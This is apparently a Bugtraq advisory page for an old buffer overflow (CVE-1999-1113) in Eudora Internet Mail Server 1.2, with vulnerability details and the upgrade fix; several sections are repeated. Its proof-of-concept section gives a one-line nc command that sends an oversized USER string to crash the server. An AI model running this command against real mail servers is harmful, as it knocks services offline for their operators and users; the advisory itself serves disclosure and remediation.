Eudora Internet Mail Server Buffer Overflow Vulnerability
BID:75
Info
Eudora Internet Mail Server Buffer Overflow Vulnerability
| Bugtraq ID: | 75 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-1999-1113 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 14 1998 12:00AM |
| Updated: | Jul 11 2009 12:16AM |
| Credit: | Published as "MacOS based buffer overflows..." by Netstat Webmaster <[email protected]> on April 14, 1998. Fix information for this problem was forwarded to SecurityFocus by Glenn Anderson <[email protected]> on July 14, 1999. |
| Vulnerable: |
Qualcomm Eudora Internet Mail Server 1.2 |
| Not Vulnerable: |
Qualcomm Eudora Internet Mail Server 2.0.1 Qualcomm Eudora Internet Mail Server 2.0 |
Discussion
Eudora Internet Mail Server Buffer Overflow Vulnerability
There appears to be a buffer overflow in Qualcomm's Eudora Internet Mail Server. If you connect to its TCP port number 106 and issue the USER command followed by a string over than a thousand bytes in length the server will crash possibly taking down the machine with it.
There appears to be a buffer overflow in Qualcomm's Eudora Internet Mail Server. If you connect to its TCP port number 106 and issue the USER command followed by a string over than a thousand bytes in length the server will crash possibly taking down the machine with it.
Exploit / POC
Eudora Internet Mail Server Buffer Overflow Vulnerability
$ echo USER `perl -e 'print "A"x2048'` | nc target.host.com 106
$ echo USER `perl -e 'print "A"x2048'` | nc target.host.com 106
Solution / Fix
Eudora Internet Mail Server Buffer Overflow Vulnerability
Solution:
This bug is fixed in EIMS 1.2.1 and later. EIMS 1.3.1 is the current version, it is available from http://www.eudora.com/freeware/servers.html
Solution:
This bug is fixed in EIMS 1.2.1 and later. EIMS 1.3.1 is the current version, it is available from http://www.eudora.com/freeware/servers.html
References
Eudora Internet Mail Server Buffer Overflow Vulnerability
References:
References: